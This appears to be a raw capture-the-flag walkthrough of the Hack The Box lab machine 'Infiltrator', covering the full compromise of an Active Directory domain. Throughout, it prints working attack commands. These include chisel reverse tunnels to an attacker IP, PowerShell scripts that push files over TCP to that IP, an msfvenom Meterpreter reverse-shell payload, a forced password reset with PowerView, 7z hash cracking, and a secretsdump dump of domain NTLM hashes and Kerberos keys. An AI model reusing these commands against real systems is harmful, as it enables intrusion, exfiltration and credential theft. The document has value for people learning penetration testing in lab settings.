Template Name: Machine
Template distinguishedname: CN=Machine,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=infiltrator,DC=htb
Date of Creation: 12/08/2023 01:52:38
[+] Extended Key Usage: Client Authentication, Server Authentication
EnrollmentFlag: AUTO_ENROLLMENT
CertificateNameFlag: SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
[+] Enrollment allowed for: INFILTRATOR\Domain Computers
[?] +++++ Checking Template 'User' +++++
[+] Identity 'INFILTRATOR\Domain Users' has enrollment rights for template 'User'
Template Name: User
Template distinguishedname: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=infiltrator,DC=htb
Date of Creation: 12/08/2023 01:52:38
[+] Extended Key Usage: Encrypting File System, Secure E-mail, Client Authentication
EnrollmentFlag: INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
CertificateNameFlag: SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
[+] Enrollment allowed for: INFILTRATOR\Domain Users
[?] +++++ Checking Template 'SubCA' +++++
[!] Template 'SubCA' has Flag 'ENROLLEE_SUPPLIES_SUBJECT'
Template Name: SubCA
Template distinguishedname: CN=SubCA,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=infiltrator,DC=htb
Date of Creation: 12/08/2023 01:52:38
EnrollmentFlag: 0
[!] CertificateNameFlag: ENROLLEE_SUPPLIES_SUBJECT
...
[?] +++++ Searching for Group Managed Service Account (gMSA) +++++
[+] Found group Managed Service Account 'infiltrator_svc$':
sAMAccountName: infiltrator_svc$
distinguishedName: CN=infiltrator_svc,CN=Managed Service Accounts,DC=infiltrator,DC=htb
objectSid: S-1-5-21-2606098828-3734741516-3625406802-3102
[+] description: dc01.infiltrator.htb
[+] AllowedToRetrieveManagedPassword: lan_managment
pwdLastSet: 12/10/2023 07:28:23
[*] lastLogonTimestamp: 02/19/2024 04:27:26 (Identity is likely not online anymore!)
userAccountControl: WORKSTATION_TRUST_ACCOUNT
...Output Messenger (k.turner)
Before we begin the certificate shinanigans let's go back to k.turner password. I discarded the network output of winPeas, but it actually has interesting information.
+----------¦ Current TCP Listening Ports
+ Check for services restricted from the outside
Enumerating IPv4 connections
Protocol Local Address Local Port Remote Address Remote Port State Process ID Process Name
...
TCP 0.0.0.0 14126 0.0.0.0 0 Listening 3524 outputmessenger_httpd
TCP 0.0.0.0 14406 0.0.0.0 0 Listening 5692 outputmessenger_mysqld
...https://support.outputmessenger.com/server-install-faq/
PS C:\Program Files> Get-Acl 'Output Messenger' | fl
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files\Output Messenger
Owner : BUILTIN\Administrators
Group : INFILTRATOR\Domain Users
Access : NT SERVICE\TrustedInstaller Allow FullControl
NT SERVICE\TrustedInstaller Allow 268435456
NT AUTHORITY\SYSTEM Allow FullControl
NT AUTHORITY\SYSTEM Allow 268435456
BUILTIN\Administrators Allow FullControl
BUILTIN\Administrators Allow 268435456
BUILTIN\Users Allow ReadAndExecute, Synchronize
BUILTIN\Users Allow -1610612736
CREATOR OWNER Allow 268435456
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow -1610612736
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow -1610612736
Audit :
Sddl : O:BAG:DUD:AI(A;ID;FA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464)(A;CIIOID;GA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464)(A;ID;FA;;;SY)(A;OICIIOID;GA;;;SY)(A
;ID;FA;;;BA)(A;OICIIOID;GA;;;BA)(A;ID;0x1200a9;;;BU)(A;OICIIOID;GXGR;;;BU)(A;OICIIOID;GA;;;CO)(A;ID;0x1200a9;;;AC)(A;OICIIOID;GXGR;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)(A;OICIIOID;GXGR;;;S-1-15-2-2)
PS C:\Program Files> Get-Acl 'Output Messenger Server' | fl
Get-Acl : Attempted to perform an unauthorized operation.Install the official app for linux:
└─$ sudo dpkg -i OutputMessenger_amd64.deb
Selecting previously unselected package outputmessenger.
(Reading database ... 535734 files and directories currently installed.)
Preparing to unpack OutputMessenger_amd64.deb ...
Unpacking outputmessenger (2.0.40) ...
Setting up outputmessenger (2.0.40) ...
Processing triggers for kali-menu (2023.4.7) ...
Processing triggers for desktop-file-utils (0.27-1) ...
Processing triggers for mailcap (3.70+nmu1) ...Time to proxify the connections!
PS C:\Users\M.harris\Music> iwr 10.10.14.43/chisel.exe -outfile chisel.exe
---
└─$ chisel server -p 36000 --reverse
---
# .\chisel.exe client 10.10.14.43:36000 R:14121-14129:localhost:14121-14129
PS C:\Users\M.harris\Music> Start-Job -ScriptBlock { & "C:\Users\M.harris\Music\chisel.exe" client 10.10.14.43:36000 R:14121:localhost:14121 R:14122:localhost:14122 R:14123:localhost:14123 R:14124:localhost:14124 R:14125:localhost:14125 R:14126:localhost:14126 R:14127:localhost:14127 R:14128:localhost:14128 R:14129:localhost:14129 R:14406:localhost:14406; }
---
└─$ outputmessengerFrom the future: Handling ports was annoying so just automate it
netstat -an | Select-String "0.0.0.0:14[0-9]{3}.*LISTENING" | % { $port = $_.ToString().Split()[6].Split(':')[1]; $portString="R:${port}:localhost:${port}"; Start-Job -ScriptBlock { param($portString); & "C:\Users\winrm_svc\Music\chisel.exe" client 10.10.14.43:36000 $portString; } -ArgumentList $portString }Creds:
k.turner:MessengerApp@Pass!:127.0.0.1
Hidden Files
Previously winPeas found hidden directory in /Users:
PS C:\Users> ls '.\All Users\' -force -rec -fil '*.zip' -ErrorAction SilentlyContinue
Directory: C:\Users\All Users\Output Messenger Server\Temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/19/2024 7:51 AM 15702539 OutputMessengerApache.zip
-a---- 2/19/2024 7:51 AM 25477937 OutputMessengerMysql.zip
-a---- 2/19/2024 7:52 AM 3369187 OutputWall.zipfunction SendOverTcp {
param ([string]$server, $port, $filePath)
$tcpClient = New-Object Net.Sockets.TcpClient($server, $port)
$stream = $tcpClient.GetStream()
$bytes = [IO.File]::ReadAllBytes($filePath)
$stream.Write($bytes, 0, $bytes.Length)
$stream.Close()
$tcpClient.Close()
}
SendOverTcp "10.10.14.43" 4444 "C:\Users\All Users\Output Messenger Server\Temp\OutputMessengerApache.zip"
SendOverTcp "10.10.14.43" 4444 "C:\Users\All Users\Output Messenger Server\Temp\OutputMessengerMysql.zip"
SendOverTcp "10.10.14.43" 4444 "C:\Users\All Users\Output Messenger Server\Temp\OutputWall.zip"MySQL
└─$ for file in $(ls *.zip); do unzip $file -d "${file%.zip}"; done;
└─$ pwd && cat OutputMysql.ini
/home//Desktop/Rooms/Infiltrator/all_users_zips/OutputMessengerMysql
[SETTINGS]
SQLPort=14406
Version=1.0.0
[DBCONFIG]
DBUsername=root
DBPassword=ibWijteig5
DBName=outputwall
[PATHCONFIG]
;mysql5.6.17
MySQL=mysql
Log=log
def_conf=settings
MySQL_data=data
Backup=backup└─$ mysql -P 14406 -u 'root' -p'ibWijteig5'
Server version: 10.1.19-MariaDB mariadb.org binary distribution
MariaDB [(none)]> SHOW DATABASES;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| outputwall |
| performance_schema |
+--------------------+
MariaDB [(none)]> USE outputwall;
MariaDB [outputwall]> SHOW TABLES;
+---------------------------+
| Tables_in_outputwall |
+---------------------------+
| ot_attachment |
| ot_comments |
| ot_entity |
| ot_entity_accounts |
| ot_entity_daysoff |
| ot_entity_setting |
| ot_sessions |
| ot_user_notification_read |
| ot_user_notifications |
| ot_wall_activity |
| ot_wall_favorite |
| ot_wall_notification |
| ot_wall_posts |
| ot_wall_tagmessages |
| ot_wall_tags |
| ot_wall_tokens |
| ot_wall_usermessages |
+---------------------------+
MariaDB [outputwall]> SELECT post_subject, post_message FROM ot_wall_posts \G
*************************** 1. row ***************************
post_subject: UserExplorer app project
post_message: Hey team, I'm here! In this screenshot, I'll guide you through using the app UserExplorer.exe. It works seamlessly with dev credentials, but remember, it's versatile and functions with any credentials. Currently, we're exploring the default option. Stay tuned for more updates!
"UserExplorer.exe -u m.harris -p D3v3l0p3r_Pass@1337! -s M.harris"
*************************** 2. row ***************************
post_subject: Security Alert! Pre-Auth Disabled on kerberos for Some Users
post_message: Hey team,
We've identified a security concern: some users and our domain (dc01.infiltrator.htb) have pre-authentication disabled on kerberos.
No need to panic! Our vigilant team is already on it and will work diligently to fix this. In the meantime, stay vigilant and be cautious about any potential security risks.
2 rows in set (0.078 sec)Unintended path
You can just read files, lmao
MariaDB [(none)]> SELECT LOAD_FILE('/Users/Administrator/Desktop/root.txt');
+----------------------------------------------------+
| LOAD_FILE('/Users/Administrator/Desktop/root.txt') |
+----------------------------------------------------+
| 483edf74dd53ffbe0eee7fe29c56943b |
+----------------------------------------------------+Output Messenger (m.harris)
Creds:
m.harris:D3v3l0p3r_Pass@1337!:127.0.0.1
I think Download button broke because I didn't have Storage Folder specified, we can use Download History to get files. still doesn't work because the app kinda died 💀 Box restart to the rescue.
Decompile the exe with ILSpy or similar, the app is written in C#
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;
using System.DirectoryServices;
public class Decryptor {
public static string DecryptString(string key, string cipherText) {
using Aes aes = Aes.Create();
aes.Key = Encoding.UTF8.GetBytes(key);
aes.IV = new byte[16];
ICryptoTransform transform = aes.CreateDecryptor(aes.Key, aes.IV);
using MemoryStream stream = new MemoryStream(Convert.FromBase64String(cipherText));
using CryptoStream stream2 = new CryptoStream(stream, transform, CryptoStreamMode.Read);
using StreamReader streamReader = new StreamReader(stream2);
return streamReader.ReadToEnd();
}
}
internal class LdapApp {
private static void Main(string[] args) {
string path = "LDAP://dc01.infiltrator.htb";
string username = "";
string password = "";
string userToSearch = "";
string username_winrm_scv = "winrm_svc";
string cipherText = "TGlu22oo8GIHRkJBBpZ1nQ/x6l36MVj3Ukv4Hw86qGE=";
for (int i = 0; i < args.Length; i += 2) {
switch (args[i].ToLower()) {
case "-u": username = args[i + 1]; break;
case "-p": password = args[i + 1]; break;
case "-s": userToSearch = args[i + 1]; break;
case "-default":
username = username_winrm_scv;
password = Decryptor.DecryptString("b14ca5898a4e4133bbce2ea2315a1916", cipherText); break;
default: Console.WriteLine($"Invalid argument: {args[i]}"); return;
}
}
if (string.IsNullOrEmpty(username) || string.IsNullOrEmpty(password) || string.IsNullOrEmpty(userToSearch)) {
Console.WriteLine("Usage: UserExplorer.exe -u <username> -p <password> -s <searchedUsername> [-default]");
Console.WriteLine("To use the default credentials: UserExplorer.exe -default -s userToSearch");
return;
}
try {
Console.WriteLine("Attempting Service Connection...");
DirectoryEntry directoryEntry = new DirectoryEntry(path, username, password);
try {
Console.WriteLine("Service Connection Successful.");
DirectorySearcher directorySearcher = new DirectorySearcher(directoryEntry);
try {
directorySearcher.Filter = $ "(SAMAccountName={text3})";
Console.WriteLine($"Search for {userToSearch} user...");
SearchResult searchResult = directorySearcher.FindOne();
if (searchResult != null) {
Console.WriteLine("User found. Details:");
DirectoryEntry directoryEntry2 = searchResult.GetDirectoryEntry();
Console.WriteLine(string.Format("Name: {0}", directoryEntry2.Properties["cn"].Value));
Console.WriteLine(string.Format("EmailID: {0}", directoryEntry2.Properties["mail"].Value));
Console.WriteLine(string.Format("Telephone Extension: {0}", directoryEntry2.Properties["telephoneNumber"].Value));
Console.WriteLine(string.Format("Department: {0}", directoryEntry2.Properties["department"].Value));
Console.WriteLine(string.Format("Job Title: {0}", directoryEntry2.Properties["title"].Value));
} else { Console.WriteLine("User not found."); }
} finally { ((IDisposable)directorySearcher)?.Dispose(); }
} finally { ((IDisposable)directoryEntry)?.Dispose(); }
} catch (Exception ex) { Console.WriteLine($"An error occurred: {ex.Message}"); }
}
}// https://www.programiz.com/online-compiler/878jSU8bZORep
using System;
using System.IO;
using System.Text;
using System.Security.Cryptography;
public class Decryptor {
public static string DecryptString(string key, string cipherText) {
using Aes aes = Aes.Create();
aes.Key = Encoding.UTF8.GetBytes(key);
aes.IV = new byte[16];
ICryptoTransform transform = aes.CreateDecryptor(aes.Key, aes.IV);
using MemoryStream stream = new MemoryStream(Convert.FromBase64String(cipherText));
using CryptoStream stream2 = new CryptoStream(stream, transform, CryptoStreamMode.Read);
using StreamReader streamReader = new StreamReader(stream2);
return streamReader.ReadToEnd();
}
private static void Main(string[] args) {
string cipherText = "TGlu22oo8GIHRkJBBpZ1nQ/x6l36MVj3Ukv4Hw86qGE=";
string key = "b14ca5898a4e4133bbce2ea2315a1916";
string password = Decryptor.DecryptString(key, cipherText);
password = Decryptor.DecryptString(key, password);
Console.WriteLine($"Password: {password}");
}
}
// Password: WinRm@$svc^!^Pevil-winrm (winrm_svc)
Creds:
winrm_svc:WinRm@$svc^!^P
└─$ evil-winrm -i dc01.infiltrator.htb -u winrm_svc -p 'WinRm@$svc^!^P'Nothing much in users directory, but we can login via chat app again
The only other user that has access to the chat is probably A.walker
Chat Logs
Winpeas showed something interesting again in home directory.
+ Searching hidden files or folders in C:\Users home (can be slow)
+ C:\Users\Default
C:\Users\Default User
C:\Users\All Users
C:\Users\winrm_svc\AppData\Roaming\Output Messenger\SpellCheck
C:\Users\All Users\ntuser.pol*Evil-WinRM* PS C:\Users\winrm_svc\AppData\Roaming\Output Messenger\JAAA> download OM.db3
Info: Downloading C:\Users\winrm_svc\AppData\Roaming\Output Messenger\JAAA\OM.db3 to OM.db3
*Evil-WinRM* PS C:\Users\winrm_svc\AppData\Roaming\Output Messenger\JAAA> download OT.db3
Info: Downloading C:\Users\winrm_svc\AppData\Roaming\Output Messenger\JAAA\OT.db3 to OT.db3
---
└─$ file *
OM.db3: SQLite 3.x database, last written using SQLite version 3008006, page size 1024, file counter 33, database pages 29, cookie 0xf, schema 4, UTF-8, version-valid-for 33
OT.db3: SQLite 3.x database, last written using SQLite version 3008006, page size 1024, file counter 8, database pages 13, cookie 0x6, schema 4, UTF-8, version-valid-for 8
The winrm_svc user has an interesting node too:
lan_managment api key 558R501T5I6024Y8JV3B7KOUN1A518GGhttps://support.outputmessenger.com/chat-room-api/#Retrieving_a_chat_room
└─$ curl 'http://localhost:14125/api/chatrooms/logs?roomkey=20240220014618@conference.com&fromdate=2018/07/24&todate=2025/07/24' -H 'API-KEY: 558R501T5I6024Y8JV3B7KOUN1A518GG' -s | jq .logs > logs.html
Hidden chat logs
Creds:
O.martinez:m@rtinez@1996!
The app was acting wacky, and luckily there was a web interface we could use. When going through the chats we see some messages we haven't seen before.
Bruteforce Try
idk My password is a combination of my name and birth year, like username + birthday which is 1999!!
First try at bruteforce:
└─$ for name in $(grep 'mart' ./kerberos/lists/usernames.txt); do echo "${name}1999" >> passwords; done;
└─$ for name in $(grep 'mart' ./kerberos/lists/usernames.txt); do echo "${name}1999\!\!" >> passwords; done;
└─$ netexec smb 10.129.98.160 -u 'O.martinez' -p passwords
... NOTHING ...She did complain about some site popping up and her calendar is full of their domain, dns poisoning to steal the user hash?
Windows Client
Run Application
For whatever the fucking reason, you need to download Windows client and then you have access to new task.
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> upload www/rev.exe
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> mkdir /temp
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> mv rev.exe /temp
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> icacls C:\temp /grant 'Everyone:(F)' /T /C
processed file: C:\temp
processed file: C:\temp\rev.exe
Successfully processed 2 files; Failed processing 0 filesFirst sync the calendar, then setup new Run Application and run the revshell that exists on remote system (MIGHT ALSO NEED TO EXIST ON YOUR WINDOWS)
Reverse Shell
PS C:\users\O.martinez> whoami /all
User Name SID
====================== ==============================================
infiltrator\o.martinez S-1-5-21-2606098828-3734741516-3625406802-1106
Group Name Type SID Attributes
========================================== ================ ============================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Group used for deny only
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\REMOTE INTERACTIVE LOGON Well-known group S-1-5-14 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
INFILTRATOR\Chiefs Marketing Group S-1-5-21-2606098828-3734741516-3625406802-1111 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
Privilege Name Description State
============================= ============================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword
This didn't work 🤔
PS C:\users\O.martinez\music> IEX(IWR 10.10.14.43/PowerView.ps1 -UseBasicParsing)
PS C:\users\O.martinez\music> $NewPassword = ConvertTo-SecureString 'Password123$' -AsPlainText -Force
PS C:\users\O.martinez\music> Set-DomainUserPassword -Identity 'M.harris' -AccountPassword $NewPassword
---
└─$ netexec smb infiltrator.htb -u 'M.harris' -p 'Password123$'
SMB 10.129.13.179 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.13.179 445 DC01 [-] infiltrator.htb\M.harris:Password123$ STATUS_ACCOUNT_RESTRICTIONSince the box is revolved around app check for something interesting.
PS C:\users\O.martinez\appdata\roaming\Output Messenger\FAAA> ls 'Received Files' -rec -file
Directory: C:\users\O.martinez\appdata\roaming\Output Messenger\FAAA\Received Files\203301
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/23/2024 4:10 PM 292244 network_capture_2024.pcapngNetwork Capture
Download the file
$server = "10.10.14.43"
$port = 4444
$filePath = "C:\users\O.martinez\appdata\roaming\Output Messenger\FAAA\Received Files\203301\network_capture_2024.pcapng"
$tcpClient = New-Object System.Net.Sockets.TcpClient($server, $port)
$networkStream = $tcpClient.GetStream()
$fileBytes = [System.IO.File]::ReadAllBytes($filePath)
$networkStream.Write($fileBytes, 0, $fileBytes.Length)
$networkStream.Flush()
$networkStream.Close()
$tcpClient.Close()
---
└─$ listen > network_capture_2024.pcapng
└─$ file *
%2f: HTML document, ASCII text
%2f(1): HTML document, ASCII text
%2f(2): HTML document, ASCII text
BitLocker-backup(1).7z: 7-zip archive data, version 0.4
BitLocker-backup.7z: HTML document, ASCII text
change_auth_token: JSON text data
files: HTML document, ASCII text, with very long lines (374)
files(1): HTML document, ASCII text, with very long lines (374)
files(2): HTML document, ASCII text
files(3): HTML document, ASCII text
login: ASCII text, with no line terminators
login(1): HTML document, ASCII text
login(2): HTML document, ASCII text
login(3): HTML document, ASCII textBitLocker
Zip is password protected so crack the password:
└─$ 7z2john BitLocker-backup\(1\).7z > bitlocker.hash
---
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe .\hashes --wordlist=.\rockyou.txt
Warning: detected hash type "7z", but the string is also recognized as "7z-opencl"
Use the "--format=7z-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (7z, 7-Zip [SHA256 256/256 AVX2 8x AES])
Cost 1 (iteration count) is 524288 for all loaded hashes
Cost 2 (padding size) is 8 for all loaded hashes
Cost 3 (compression type) is 2 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
zipper (BitLocker-backup(1).7z)
1g 0:00:01:55 DONE (2024-09-03 18:03) 0.008683g/s 48.34p/s 48.34c/s 48.34C/s blacks..spartans
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Recovery key:
650540-413611-429792-307362-466070-397617-148445-087043Hmmm.... There's also some kind of authorization password
Connection errors
I decided to upgrade to persistent shell because the connection was not acting nicely.
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=4445 -f exe -o rev.exe
---
└─$ msfconsole -q
[*] Starting persistent handler(s)...
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
msf6 exploit(multi/handler) > set LPORT 4445
msf6 exploit(multi/handler) > runAnd at this moment my box died 🎉
Previous I had luck dependent method work, so this time I restarted the box, switch network adapter from NAT to Bridged and setup ligolo-ng
Lol, I had problems setting it up so I just went back to Chisel, which works very nicely!
Setup chisel on remote, and when you connect to Chat server specify the IP of your attacker box (~kali). Access chain like: Host -> Kali -> Victim
Drives Enumeration
Get drives available on system:
PS C:\Users\O.martinez> Get-PSDrive
Name Used (GB) Free (GB) Provider Root CurrentLocation
---- --------- --------- -------- ---- ---------------
Alias Alias
C 15.07 43.32 FileSystem C:\ Users\O.martinez
Cert Certificate \ CurrentUser
Env Environment
Function Function
HKCU Registry HKEY_CURRENT_USER
HKLM Registry HKEY_LOCAL_MACHINE
Variable Variable
WSMan WSMan
PS C:\Users\O.martinez> Get-Volume
DriveLetter FriendlyName FileSystemType DriveType HealthStatus OperationalStatus SizeRemaining Size
----------- ------------ -------------- --------- ------------ ----------------- ------------- ----
E Unknown Fixed Healthy Unknown 0 B 0 B
C NTFS Fixed Healthy OK 43.32 GB 58.4 GBPS C:\Users\O.martinez\Music> .\wp.exe | tee-object -filepath wp.log
...
Drives Information
Remember that you should search more info inside the other drives
C:\ (Type: Fixed)(Filesystem: NTFS)(Available space: 43 GB)(Permissions: Users [AppendData/CreateDirectories])
E:\ (Type: Fixed)
...
Services Information
Interesting Services -non Microsoft-
Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
OutputMessengerApache(Output Messenger - Apache)["C:\Program Files\Output Messenger Server\Plugins\Output\apache2\bin\outputmessenger_httpd.exe" -k runservice] - Auto - Running
Apache/2.4.9 (Win32) PHP/5.5.12
=================================================================================================
OutputMessengerMySQL(Output Messenger - MySQL)["C:\Program Files\Output Messenger Server\Plugins\Output\mysql\bin\outputmessenger_mysqld.exe" "--defaults-file=C:\Program Files\Output Messenger Server\Plugins\Output\mysql\my.ini" "OutputMessengerMySQL"] - Auto - Running
Output Messenger - MySQL
=================================================================================================
...
Checking write permissions in PATH folders (DLL Hijacking)
Check for DLL Hijacking in PATH folders https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dll-hijacking
C:\Windows\system32
C:\Windows
C:\Windows\System32\Wbem
C:\Windows\System32\WindowsPowerShell\v1.0\
C:\Windows\System32\OpenSSH\
C:\Program Files\Output Messenger Server\Plugins\Output\apache2\bin\
C:\Program Files\Output Messenger Server\Plugins\Output\php\
C:\Program Files\Output Messenger Server\Plugins\Output\mysql\bin\
...Martinez Password
Creds:
O.martinez:M@rtinez_P@ssw0rd!
RDP
We can now finally RDP as Martinez.
The drive can be found via explorer at E: and you need to use the Recovery Code, then we can find interesting files in Administrator's home.
Note: I exfiltrated file via simple PHP server https://gist.github.com/taterbase/2688850 (
php -S 0.0.0.0:80andmkdir uploads)
Exfiltrate the file and check contents
└─$ 7z x Backup_Credentials.7z
└─$ lta
drwxr-xr-x - woyag 3 Sep 16:22 .
drwxr-xr-x - woyag 25 Feb 10:12 ├── 'Active Directory'
.rw-r--r-- 36M woyag 25 Feb 10:12 │ └── ntds.dit
.rw-r--r-- 2.1M woyag 3 Sep 16:22 ├── Backup_Credentials.7z
drwxr-xr-x - woyag 25 Feb 10:12 └── registry
.rw-r--r-- 262k woyag 25 Feb 10:00 ├── SECURITY
.rw-r--r-- 13M woyag 25 Feb 10:00 └── SYSTEMDump the passwords via secretsdump:
└─$ impacket-secretsdump -security ./registry/SECURITY -system ./registry/SYSTEM -ntds ./Active\ Directory/ntds.dit LOCAL
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Target system bootKey: 0xd7e7d8797c1ccd58d95e4fb25cb7bdd4
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:4b90048ad6028aae98f66484009266d4efa571d48a8aa6b771d69d20aba16ddb7e0a0ffe9378a1ac7b31a812f0760fe2a8ce66ff6a0ff772155a29baa59b4407a95a920d0904cba6f8b19b6393f1551a476f991bbedaa66880e60611482a81b31b34c55c77d0e0d1792e3b18cdc9d39e0b776e7ef082399b096aaa2e8d93eb1f0340fd5f6e138da2580d1f581ff9426dce99a901a1bf88ad3f19a5bc4ce8ff17fdbb0a04bb29f13dc46177a6d8cd61bf91f8342e33b5362daecbb888df22ce467aa9f45a9dc69b03d116eeac89857d17f3f44f4abc34165b296a42b3b3ff5ab26401b5734fab6ad142d7882715927e45
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:fe4767309896203c581b9fc3c5e23b00
[*] DefaultPassword
(Unknown User):ROOT#123
[*] DPAPI_SYSTEM
dpapi_machinekey:0x81f5247051ff9535ad8299f0efd531ff3a5cb688
dpapi_userkey:0x79d13d91a01f6c38437c526396febaf8c1bc6909
[*] NL$KM
0000 2E 8A EC D8 ED 12 C6 ED 26 8E B0 9B DF DA 42 B7 ........&.....B.
0010 49 DA B0 07 05 EE EA 07 05 02 04 0E AD F7 13 C2 I...............
0020 6C 6D 8E 19 1A B0 51 41 7C 7D 73 9E 99 BA CD B1 lm....QA|}s.....
0030 B7 7A 3E 0F 59 50 1C AD 8F 14 62 84 3F AC A9 92 .z>.YP....b.?...
NL$KM:2e8aecd8ed12c6ed268eb09bdfda42b749dab00705eeea070502040eadf713c26c6d8e191ab051417c7d739e99bacdb1b77a3e0f59501cad8f1462843faca992
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: d27644ab3070f72ec264fcb413d75299
[*] Reading and decrypting hashes from ./Active Directory/ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7bf62b9c45112ffdadb7b6b4b9299dd2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1001:aad3b435b51404eeaad3b435b51404ee:fe4767309896203c581b9fc3c5e23b00:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:454fcbc37690c6e4628ab649e8e285a5:::
infiltrator.htb\winrm_svc:1104:aad3b435b51404eeaad3b435b51404ee:84287cd16341b91eb93a58456b73e30f:::
infiltrator.htb\lan_managment:1105:aad3b435b51404eeaad3b435b51404ee:e8ade553d9b0cb1769f429d897c92931:::
infiltrator.htb\M.harris:1106:aad3b435b51404eeaad3b435b51404ee:fc236589c448c620417b15597a3d3ca7:::
infiltrator.htb\D.anderson:1107:aad3b435b51404eeaad3b435b51404ee:627a2cb0adc7ba12ea11174941b3da88:::
infiltrator.htb\L.clark:1108:aad3b435b51404eeaad3b435b51404ee:627a2cb0adc7ba12ea11174941b3da88:::
infiltrator.htb\O.martinez:1109:aad3b435b51404eeaad3b435b51404ee:eb86d7bcb30c8eac1bdcae5061e2dff4:::
infiltrator.htb\A.walker:1110:aad3b435b51404eeaad3b435b51404ee:46389d8dfdfcf0cbe262a71f576e574b:::
infiltrator.htb\K.turner:1111:aad3b435b51404eeaad3b435b51404ee:48bcd1cdc870c6285376a990c2604531:::
infiltrator.htb\E.rodriguez:1112:aad3b435b51404eeaad3b435b51404ee:b1918c2ce6a62f4eee11c51b6e2e965a:::
[*] Kerberos keys from ./Active Directory/ntds.dit
DC$:aes256-cts-hmac-sha1-96:09b3e08f549e92e0b16ed45f84b25cc6d0c147ff169ce059811a3ed9e6957176
DC$:aes128-cts-hmac-sha1-96:d2a3d7c9ee6965b1e3cd710ed1ceed0f
DC$:des-cbc-md5:5eea34b3317aea91
krbtgt:aes256-cts-hmac-sha1-96:f6e0a1bd3a180f83472cd2666b28de969442b7745545afb84bbeaa9397cb9b87
krbtgt:aes128-cts-hmac-sha1-96:7874dff8138091d6c344381c9c758540
krbtgt:des-cbc-md5:10bfc49ecd3b58d9
infiltrator.htb\winrm_svc:aes256-cts-hmac-sha1-96:ae473ae7da59719ebeec93c93704636abb7ee7ff69678fdec129afe2fc1592c4
infiltrator.htb\winrm_svc:aes128-cts-hmac-sha1-96:0faf5e0205d6f43ae37020f79f60606a
infiltrator.htb\winrm_svc:des-cbc-md5:7aba231386c2ecf8
infiltrator.htb\lan_managment:aes256-cts-hmac-sha1-96:6fcd2f66179b6b852bb3cc30f2ba353327924081c47d09bc5a9fafc623016e96
infiltrator.htb\lan_managment:aes128-cts-hmac-sha1-96:48f45b8eb2cbd8dbf578241ee369ddd9
infiltrator.htb\lan_managment:des-cbc-md5:31c83197ab944052
